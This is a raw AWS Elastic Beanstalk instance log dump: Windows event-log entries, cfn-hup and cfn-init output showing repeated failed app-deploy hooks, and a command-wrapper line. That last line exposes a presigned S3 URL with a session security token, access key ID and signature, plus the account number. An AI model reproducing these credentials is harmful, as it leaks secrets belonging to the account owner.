Retrieving logs...
============= i-01d5df45f156a469d ==============

EventLog Application:


2025-07-16T11:42:52.000Z Information 0:(0) Software Protection Platform Service - Successfully scheduled Software Protection service for re-start at 2025-07-21T10:34:52Z. Reason: RulesEngine.
2025-07-16T11:42:22.000Z Information 0:(0) Software Protection Platform Service - Offline downlevel migration succeeded.
2025-07-16T10:44:13.000Z Information 0:(0) Software Protection Platform Service - Successfully scheduled Software Protection service for re-start at 2025-07-21T10:35:13Z. Reason: RulesEngine.
2025-07-16T10:43:36.000Z Information 0:(0) Software Protection Platform Service - Offline downlevel migration succeeded.
2025-07-16T07:18:45.000Z Information 0:(0) Software Protection Platform Service - Successfully scheduled Software Protection service for re-start at 2025-07-21T10:34:45Z. Reason: RulesEngine.
2025-07-16T07:18:15.000Z Information 0:(0) Software Protection Platform Service - Offline downlevel migration succeeded.
2025-07-15T11:58:20.000Z Information 0:(0) Software Protection Platform Service - Successfully scheduled Software Protection service for re-start at 2025-07-21T10:35:20Z. Reason: RulesEngine.
2025-07-15T11:57:50.000Z Information 0:(0) Software Protection Platform Service - Offline downlevel migration succeeded.
2025-07-15T10:44:38.000Z Information 0:(0) Software Protection Platform Service - Successfully scheduled Software Protection service for re-start at 2025-07-21T10:35:38Z. Reason: RulesEngine.
2025-07-15T10:44:06.000Z Information 0:(0) Software Protection Platform Service - Offline downlevel migration succeeded.
2025-07-15T10:44:05.000Z Information 0:(0) Software Protection Platform Service - Successfully scheduled Software Protection service for re-start at 2025-07-21T10:35:05Z. Reason: RulesEngine.
2025-07-15T10:43:35.000Z Information 0:(0) Software Protection Platform Service - Offline downlevel migration succeeded.
2025-07-15T08:33:28.000Z Information 1:General ESENT - svchost (2080,D,35) DS_Token_DB: The database engine created a new database (1, C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat). (Time=0 seconds)



Additional Data: lgposCreate = 00000001:0001:0268



Internal Timing Sequence: 
[1] 0.000049 +J(0) +M(C:0K, Fs:2, WS:8K # 8K, PF:4K # 4K, P:4K)
[2] 0.002976 -0.000933 (1) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:1, WS:4K # 4K, PF:0K # 0K, P:0K)
[3] 0.017094 -0.000004 (3) WT +J(0) +M(C:0K, Fs:20, WS:76K # 80K, PF:48K # 52K, P:48K)
[4] 0.020179 -0.019639 (1) WT +J(0) +M(C:0K, Fs:53, WS:212K # 264K, PF:84K # 84K, P:84K)
[5] 0.000117 +J(CM:0, PgRf:3, Rd:0/0, Dy:3/6, Lg:122/4) +M(C:8K, Fs:30, WS:120K # 64K, PF:156K # 156K, P:156K)
[6] 0.016621 -0.013117 (3) WT +J(CM:0, PgRf:249, Rd:0/0, Dy:16/428, Lg:28550/465) +M(C:64K, Fs:96, WS:376K # 376K, PF:624K # 624K, P:624K)
[7] 0.002123 -0.001003 (1) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:4096/2) +M(C:0K, Fs:1, WS:4K # 4K, PF:0K # 0K, P:0K)
[8] 0.000004 +J(0)
[9] 0.010387 -0.009036 (4) WT +J(0) +M(C:0K, Fs:5, WS:16K # 16K, PF:0K # 0K, P:0K)
[10] 0.019677 -0.005774 (31) CM -0.011266 (38) WT +J(CM:31, PgRf:385, Rd:0/31, Dy:10/94, Lg:12509/128) +M(C:-40K, Fs:23, WS:48K # 52K, PF:44K # 60K, P:44K)
[11] 0.000003 +J(0).
2025-07-15T08:33:27.000Z Information 1:General ESENT - svchost (2080,D,35) DS_Token_DB: New flush map file "C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm" will be created to enable persisted lost flush detection.
2025-07-15T08:33:27.000Z Information 1:General ESENT - svchost (2080,D,0) DS_Token_DB: The database engine started a new instance (0). (Time=0 seconds)



Additional Data:





Internal Timing Sequence: 
[1] 0.000569 +J(0) +M(C:0K, Fs:143, WS:560K # 560K, PF:2380K # 2380K, P:2380K)
[2] 0.000499 +J(0) +M(C:8K, Fs:128, WS:504K # 504K, PF:1144K # 1144K, P:1144K)
[3] 0.000029 +J(0) +M(C:0K, Fs:11, WS:44K # 44K, PF:64K # 64K, P:64K)
[4] 0.000203 +J(0) +M(C:0K, Fs:26, WS:100K # 100K, PF:164K # 164K, P:164K)
[5] 0.000920 +J(0) +M(C:0K, Fs:7, WS:28K # 28K, PF:20K # 20K, P:20K)
[6] 0.001953 +J(0) +M(C:0K, Fs:28, WS:108K # 108K, PF:20K # 20K, P:20K)
[7] -
[8] -
[9] -
[10] -
[11] -
[12] -
[13] 0.073111 -0.061887 (4) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:616/1) +M(C:0K, Fs:87, WS:284K # 320K, PF:88K # 96K, P:88K)
[14] 0.000014 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K)
[15] 0.000036 +J(0) +M(C:0K, Fs:18, WS:72K # 40K, PF:68K # 60K, P:68K)
[16] 0.012589 -0.000178 (3) WT +J(0) +M(C:0K, Fs:9, WS:28K # 32K, PF:12K # 16K, P:12K).
2025-07-15T08:33:27.000Z Information 1:General ESENT - svchost (2080,P,98) DS_Token_DB: The database engine (10.00.17763.0000) is starting a new instance (0).
2025-07-15T06:23:59.000Z Information 0:(0) Software Protection Platform Service - Successfully scheduled Software Protection service for re-start at 2025-07-21T10:34:59Z. Reason: RulesEngine.
2025-07-15T06:23:29.000Z Information 0:(0) Software Protection Platform Service - Offline downlevel migration succeeded.
2025-07-15T04:34:56.000Z Information 0:(0) Microsoft-Windows-CAPI2 - Successful auto update of third-party root list with effective date: ‎Monday, ‎June ‎16, ‎2025 5:56:11 PM.
2025-07-14T10:37:33.000Z Information 0:(0) Microsoft-Windows-LoadPerf - Performance counters for the WmiApRpl (WmiApRpl) service were loaded successfully. The Record Data in the data section contains the new index values assigned to this service.
2025-07-14T10:37:33.000Z Information 0:(0) Microsoft-Windows-LoadPerf - Performance counters for the WmiApRpl (WmiApRpl) service were removed successfully. The Record Data contains the new values of the system Last Counter and Last Help registry entries.
2025-07-14T10:36:15.000Z 0 0:(0) Software Protection Platform Service - The Software Protection service has stopped.

2025-07-14T10:36:15.000Z Information 0:(0) Software Protection Platform Service - Successfully scheduled Software Protection service for re-start at 2025-07-21T10:35:15Z. Reason: RulesEngine.
2025-07-14T10:35:45.000Z Information 0:(0) Software Protection Platform Service - SLUI.exe was launched with the following command-line parameters:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=34e1ae55-27f8-4950-8877-7a03be5fb181;NotificationInterval=1440;Trigger=TimerEvent
2025-07-14T10:35:45.000Z Information 0:(0) Software Protection Platform Service - The Software Protection service has completed licensing status check.
Application Id=55c92734-d682-4d71-983e-d6ec3f16059f
Licensing Status=
1: 1124ad22-3737-4c21-bfab-ae36a5323828, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
2: 175a4401-9571-44e3-b7ed-1418ac983e2b, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
3: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
4: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
5: 34e1ae55-27f8-4950-8877-7a03be5fb181, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x00000000 259200)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )]
6: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
7: 44aba848-245e-4e1a-ac42-1def36871f95, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
9: 6bad0243-1c35-46b2-b8e6-7a853e37413f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
10: 7305f85e-3cc0-4168-807e-af0afae1f51f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
11: 7c815a7a-6d68-4369-9cfa-c3671c8d1a3f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
12: 82fcf64d-f9dd-4411-9c79-f2eed16d4eb8, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
13: 84e331f6-4279-48c4-ab10-b75139181351, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
14: 864fa973-9c03-4e02-81d2-87fd17bc0b8c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
15: 950d5c80-3a8b-4c7a-991b-6487e045dbc3, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
16: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
17: c28b8385-97ea-4fb1-acae-57fa346e6158, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
18: ceae6266-8034-48db-92e4-fc94eb11742f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
19: d8966f28-347f-4d92-8912-1e57d357200b, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]
20: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]



cfn-hup.log:

2025-07-15 17:03:01,429 [INFO] Refreshing listener credentials
2025-07-15 17:03:01,945 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 17:33:00,971 [INFO] Refreshing listener credentials
2025-07-15 17:33:01,486 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 18:03:00,521 [INFO] Refreshing listener credentials
2025-07-15 18:03:01,005 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 18:33:00,018 [INFO] Refreshing listener credentials
2025-07-15 18:33:00,595 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 19:02:59,624 [INFO] Refreshing listener credentials
2025-07-15 19:03:00,155 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 19:32:59,179 [INFO] Refreshing listener credentials
2025-07-15 19:32:59,664 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 20:02:58,694 [INFO] Refreshing listener credentials
2025-07-15 20:02:59,194 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 20:32:58,232 [INFO] Refreshing listener credentials
2025-07-15 20:32:58,716 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 21:02:57,748 [INFO] Refreshing listener credentials
2025-07-15 21:02:58,233 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 21:32:57,269 [INFO] Refreshing listener credentials
2025-07-15 21:32:57,737 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 22:02:56,755 [INFO] Refreshing listener credentials
2025-07-15 22:02:57,224 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 22:32:56,255 [INFO] Refreshing listener credentials
2025-07-15 22:32:56,749 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 23:02:55,761 [INFO] Refreshing listener credentials
2025-07-15 23:02:56,229 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-15 23:32:55,249 [INFO] Refreshing listener credentials
2025-07-15 23:32:55,733 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 00:02:54,758 [INFO] Refreshing listener credentials
2025-07-16 00:02:55,242 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 00:32:54,271 [INFO] Refreshing listener credentials
2025-07-16 00:32:54,755 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 01:02:53,774 [INFO] Refreshing listener credentials
2025-07-16 01:02:54,258 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 01:32:53,291 [INFO] Refreshing listener credentials
2025-07-16 01:32:53,760 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 02:02:52,777 [INFO] Refreshing listener credentials
2025-07-16 02:02:53,246 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 02:32:52,267 [INFO] Refreshing listener credentials
2025-07-16 02:32:52,767 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 03:02:51,800 [INFO] Refreshing listener credentials
2025-07-16 03:02:52,269 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 03:32:51,285 [INFO] Refreshing listener credentials
2025-07-16 03:32:51,754 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 04:02:50,795 [INFO] Refreshing listener credentials
2025-07-16 04:02:51,280 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 04:32:50,317 [INFO] Refreshing listener credentials
2025-07-16 04:32:50,785 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 05:02:49,811 [INFO] Refreshing listener credentials
2025-07-16 05:02:50,280 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 05:32:49,307 [INFO] Refreshing listener credentials
2025-07-16 05:32:49,776 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 06:02:48,820 [INFO] Refreshing listener credentials
2025-07-16 06:02:49,320 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 06:32:48,347 [INFO] Refreshing listener credentials
2025-07-16 06:32:48,987 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 07:02:48,009 [INFO] Refreshing listener credentials
2025-07-16 07:02:48,509 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 07:32:47,533 [INFO] Refreshing listener credentials
2025-07-16 07:32:48,017 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 08:02:47,041 [INFO] Refreshing listener credentials
2025-07-16 08:02:47,526 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 08:32:46,549 [INFO] Refreshing listener credentials
2025-07-16 08:32:47,017 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 09:02:46,037 [INFO] Refreshing listener credentials
2025-07-16 09:02:46,491 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 09:32:45,516 [INFO] Refreshing listener credentials
2025-07-16 09:32:45,985 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 10:02:45,012 [INFO] Refreshing listener credentials
2025-07-16 10:02:45,465 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 10:32:44,497 [INFO] Refreshing listener credentials
2025-07-16 10:32:44,981 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 11:02:44,009 [INFO] Refreshing listener credentials
2025-07-16 11:02:44,509 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 11:32:43,527 [INFO] Refreshing listener credentials
2025-07-16 11:32:44,012 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 12:02:43,033 [INFO] Refreshing listener credentials
2025-07-16 12:02:43,502 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 12:32:42,526 [INFO] Refreshing listener credentials
2025-07-16 12:32:43,011 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 13:02:42,038 [INFO] Refreshing listener credentials
2025-07-16 13:02:42,538 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 13:32:41,574 [INFO] Refreshing listener credentials
2025-07-16 13:32:42,058 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 14:02:41,084 [INFO] Refreshing listener credentials
2025-07-16 14:02:41,584 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 14:27:17,159 [INFO] Received command ElasticBeanstalkCommand-AWSEBAutoScalingGroup (invocation id: beb5bab3-137f-4342-b9de-c1e29df7b671)
2025-07-16 14:27:17,159 [INFO] Running action for aws-eb-command-handler
2025-07-16 14:27:17,206 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-16 14:27:47,523 [INFO] Action for aws-eb-command-handler succeeded, returning SUCCESS
2025-07-16 14:30:44,715 [INFO] Received command ElasticBeanstalkCommand-AWSEBAutoScalingGroup (invocation id: de2a5a4e-f194-457b-9f19-a161e2d023b5)
2025-07-16 14:30:44,715 [INFO] Running action for aws-eb-command-handler
2025-07-16 14:30:44,746 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-16 14:30:48,918 [INFO] Action for aws-eb-command-handler succeeded, returning SUCCESS
2025-07-16 14:32:40,610 [INFO] Refreshing listener credentials
2025-07-16 14:32:41,094 [INFO] Scheduling next credential refresh in 1799.0 seconds
2025-07-16 14:37:01,842 [INFO] Received command ElasticBeanstalkCommand-AWSEBAutoScalingGroup (invocation id: 8fd77357-b973-4469-aad7-17ba9e7ba482)
2025-07-16 14:37:01,842 [INFO] Running action for aws-eb-command-handler
2025-07-16 14:37:01,920 [INFO] IO redirection is working. Redirecting the output to logs

cfn-init.log:

2025-07-14 10:59:50,297 [DEBUG] CloudFormation client initialized with endpoint https://cloudformation.us-east-1.amazonaws.com
2025-07-14 10:59:50,297 [DEBUG] Describing resource AWSEBAutoScalingGroup in stack arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891
2025-07-14 10:59:50,907 [INFO] Command 03writeconfig succeeded
2025-07-14 10:59:50,938 [INFO] Running configSet Infra-EmbeddedPreBuild
2025-07-14 10:59:50,954 [INFO] Running configSet Hook-PreAppDeploy
2025-07-14 10:59:50,969 [INFO] Running config Hook-PreAppDeploy
2025-07-14 10:59:51,063 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-14 11:00:10,380 [INFO] Command hooks succeeded
2025-07-14 11:00:10,538 [INFO] Running configSet Infra-EmbeddedPostBuild
2025-07-14 11:00:10,569 [INFO] Running configSet Hook-EnactAppDeploy
2025-07-14 11:00:10,599 [INFO] Running config Hook-EnactAppDeploy
2025-07-14 11:00:10,724 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-14 11:00:12,552 [ERROR] Command hooks (HooksExecutor.exe appdeploy\enact) failed
2025-07-14 11:00:12,552 [ERROR] Error encountered during build of Hook-EnactAppDeploy: Command hooks failed
Traceback (most recent call last):
  File "cfnbootstrap\construction.pyc", line 581, in run_config
  File "cfnbootstrap\construction.pyc", line 146, in run_commands
  File "cfnbootstrap\command_tool.pyc", line 127, in apply
cfnbootstrap.construction_errors.ToolError: Command hooks failed
2025-07-14 11:00:12,552 [ERROR] -----------------------BUILD FAILED!------------------------
2025-07-14 11:00:12,552 [ERROR] Unhandled exception during build: Command hooks failed
Traceback (most recent call last):
  File "cfn-init", line 181, in <module>
  File "cfnbootstrap\construction.pyc", line 137, in build
  File "cfnbootstrap\construction.pyc", line 567, in build
  File "cfnbootstrap\construction.pyc", line 581, in run_config
  File "cfnbootstrap\construction.pyc", line 146, in run_commands
  File "cfnbootstrap\command_tool.pyc", line 127, in apply
cfnbootstrap.construction_errors.ToolError: Command hooks failed
2025-07-14 11:14:23,501 [DEBUG] CloudFormation client initialized with endpoint https://cloudformation.us-east-1.amazonaws.com
2025-07-14 11:14:23,501 [DEBUG] Describing resource AWSEBAutoScalingGroup in stack arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891
2025-07-14 11:14:25,908 [INFO] -----------------------Starting build-----------------------
2025-07-14 11:14:25,939 [INFO] Running configSets: InfoTask-TailLogs
2025-07-14 11:14:25,955 [INFO] Running configSet InfoTask-TailLogs
2025-07-14 11:14:25,970 [INFO] Running config InfoTask-TailLogs
2025-07-14 11:14:26,064 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-14 11:14:27,392 [INFO] Command taillogs succeeded
2025-07-14 11:14:27,439 [INFO] ConfigSets completed
2025-07-14 11:14:27,455 [INFO] -----------------------Build complete-----------------------
2025-07-16 14:27:18,768 [DEBUG] CloudFormation client initialized with endpoint https://cloudformation.us-east-1.amazonaws.com
2025-07-16 14:27:18,768 [DEBUG] Describing resource AWSEBAutoScalingGroup in stack arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891
2025-07-16 14:27:21,081 [INFO] -----------------------Starting build-----------------------
2025-07-16 14:27:21,159 [INFO] Running configSets: Infra-WriteRuntimeConfig, Infra-EmbeddedPreBuild, Hook-PreAppDeploy, Infra-EmbeddedPostBuild, Hook-EnactAppDeploy, Hook-PostAppDeploy
2025-07-16 14:27:21,175 [INFO] Running configSet Infra-WriteRuntimeConfig
2025-07-16 14:27:21,190 [INFO] Running config Infra-WriteRuntimeConfig
2025-07-16 14:27:21,284 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-16 14:27:21,300 [INFO] Command 01mkdir succeeded
2025-07-16 14:27:21,347 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-16 14:27:21,612 [DEBUG] CloudFormation client initialized with endpoint https://cloudformation.us-east-1.amazonaws.com
2025-07-16 14:27:21,612 [DEBUG] Describing resource AWSEBAutoScalingGroup in stack arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891
2025-07-16 14:27:22,190 [INFO] Command 02writeappsource succeeded
2025-07-16 14:27:22,206 [INFO] Waiting 5 seconds for reboot
2025-07-16 14:27:27,241 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-16 14:27:27,491 [DEBUG] CloudFormation client initialized with endpoint https://cloudformation.us-east-1.amazonaws.com
2025-07-16 14:27:27,491 [DEBUG] Describing resource AWSEBAutoScalingGroup in stack arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891
2025-07-16 14:27:28,117 [INFO] Command 03writeconfig succeeded
2025-07-16 14:27:28,148 [INFO] Running configSet Infra-EmbeddedPreBuild
2025-07-16 14:27:28,163 [INFO] Running configSet Hook-PreAppDeploy
2025-07-16 14:27:28,179 [INFO] Running config Hook-PreAppDeploy
2025-07-16 14:27:28,273 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-16 14:27:40,741 [INFO] Command hooks succeeded
2025-07-16 14:27:40,788 [INFO] Running configSet Infra-EmbeddedPostBuild
2025-07-16 14:27:40,820 [INFO] Running configSet Hook-EnactAppDeploy
2025-07-16 14:27:40,835 [INFO] Running config Hook-EnactAppDeploy
2025-07-16 14:27:41,023 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-16 14:27:47,257 [ERROR] Command hooks (HooksExecutor.exe appdeploy\enact) failed
2025-07-16 14:27:47,257 [ERROR] Error encountered during build of Hook-EnactAppDeploy: Command hooks failed
Traceback (most recent call last):
  File "cfnbootstrap\construction.pyc", line 581, in run_config
  File "cfnbootstrap\construction.pyc", line 146, in run_commands
  File "cfnbootstrap\command_tool.pyc", line 127, in apply
cfnbootstrap.construction_errors.ToolError: Command hooks failed
2025-07-16 14:27:47,257 [ERROR] -----------------------BUILD FAILED!------------------------
2025-07-16 14:27:47,273 [ERROR] Unhandled exception during build: Command hooks failed
Traceback (most recent call last):
  File "cfn-init", line 181, in <module>
  File "cfnbootstrap\construction.pyc", line 137, in build
  File "cfnbootstrap\construction.pyc", line 567, in build
  File "cfnbootstrap\construction.pyc", line 581, in run_config
  File "cfnbootstrap\construction.pyc", line 146, in run_commands
  File "cfnbootstrap\command_tool.pyc", line 127, in apply
cfnbootstrap.construction_errors.ToolError: Command hooks failed
2025-07-16 14:30:45,293 [DEBUG] CloudFormation client initialized with endpoint https://cloudformation.us-east-1.amazonaws.com
2025-07-16 14:30:45,293 [DEBUG] Describing resource AWSEBAutoScalingGroup in stack arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891
2025-07-16 14:30:47,621 [INFO] -----------------------Starting build-----------------------
2025-07-16 14:30:47,652 [INFO] Running configSets: InfoTask-TailLogs
2025-07-16 14:30:47,668 [INFO] Running configSet InfoTask-TailLogs
2025-07-16 14:30:47,684 [INFO] Running config InfoTask-TailLogs
2025-07-16 14:30:47,778 [INFO] IO redirection is working. Redirecting the output to logs
2025-07-16 14:30:48,824 [INFO] Command taillogs succeeded
2025-07-16 14:30:48,856 [INFO] ConfigSets completed
2025-07-16 14:30:48,856 [INFO] -----------------------Build complete-----------------------
2025-07-16 14:37:03,560 [DEBUG] CloudFormation client initialized with endpoint https://cloudformation.us-east-1.amazonaws.com
2025-07-16 14:37:03,560 [DEBUG] Describing resource AWSEBAutoScalingGroup in stack arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891
2025-07-16 14:37:05,951 [INFO] -----------------------Starting build-----------------------
2025-07-16 14:37:06,013 [INFO] Running configSets: InfoTask-TailLogs
2025-07-16 14:37:06,029 [INFO] Running configSet InfoTask-TailLogs
2025-07-16 14:37:06,045 [INFO] Running config InfoTask-TailLogs
2025-07-16 14:37:06,138 [INFO] IO redirection is working. Redirecting the output to logs

AWSCommandWrapper.log:

2025-07-16 14:27:17,472 INFO 1 CfnCommandWrapperApp.CommandWrapper - Command: Id = beb5bab3-137f-4342-b9de-c1e29df7b671, Dispatcher = arn:aws:cloudformation:us-east-1:958193682725:dispatcher/awseb-e-pf76dvqga3-stack/881d93a0-a192-48d7-8ce0-aed4a7be2345, Data = https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/0c7efe38-4a30-46e3-b3b0-9a4a025e7c07?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEEcaCXVzLWVhc3QtMSJIMEYCIQDQtLOoDcLspqr0FQK5I%2Fi3SZoL%2Bf%2B2TPdjUnyba11wtQIhAPTnB3vdXpyJ3upr6vQaAZcxVUPDVFsGQmYT5AQ8Ey0BKusCCF8QABoMMjU3MTcyMzkxMTQ5Igw8GQZdBMQM%2FW733wYqyAL4o7XsK9tnWacxq1rZytV%2BJNRbK5qEXkisvqrtfNcBQJ1soN5TwcTxavHrN5A4OeFN1rKYSvCChipM1eoZqgxkg94a9e5yLTgZ9hepNU9WRVnPUQ5QJBWYMko19sdRUvmygdW8vzLZ7FsEVKdV9Ko1VxZiuYPnxkonrgTzz2PXTOGs%2BSqSTqAIhXrfq4Tt2hbRfoqyBuky8XM8BMRlT0dzquClrTcTUZ3mw0%2FwZOFfS6uTGtQunGmTzlykJMXSqwMfu9HCqTaR8NgcwYQ0G2YfvwzmfvVAI3V7ZpIhyzGrcTMfVVGWLjK58WVSEFllnfthWIWZph%2BUK4LAssui%2FnnefI4yNoVIaAuANdrD6qwXkGpKJHflsw2gr244w3Jg1OdvIesRHdslvuOEAQZeiMOyOvrajFOEPpsmjIOqLNcMuh4TDrkAzJBTMP7k3sMGOr4B1ospW%2FRrcQGQ%2F0piWtJ81adoOM4TmGei2jxt8ARwgbYP3rhN2ltkLya%2BwIILJOrcviTm%2BPz6LWxwdL4gZ4PYxeHDftULArowfPbrasWA0ZYiQbpPogCTPsAOu04AGyvT5SBbblfRwdmBj7D46QKWB1CTZzaGx8W4noxcMf08%2FyF6kbI%2Bdj6FUom1u6HYlYlk4a%2FxRc27wjmoaDDSbrXk71j804BZndVftfwtfAoRDDjFdcb0CJeiybuxrd5Vhw%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250716T142717Z&X-Amz-SignedHeaders=host&X-Amz-Expires=300&X-Amz-Credential=ASIATXYFLITW34TIQYG7%2F20250716%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=91ea428a49d742496d0ffc656b3de52e88690b9e288f8561466ca3b3832af1cf
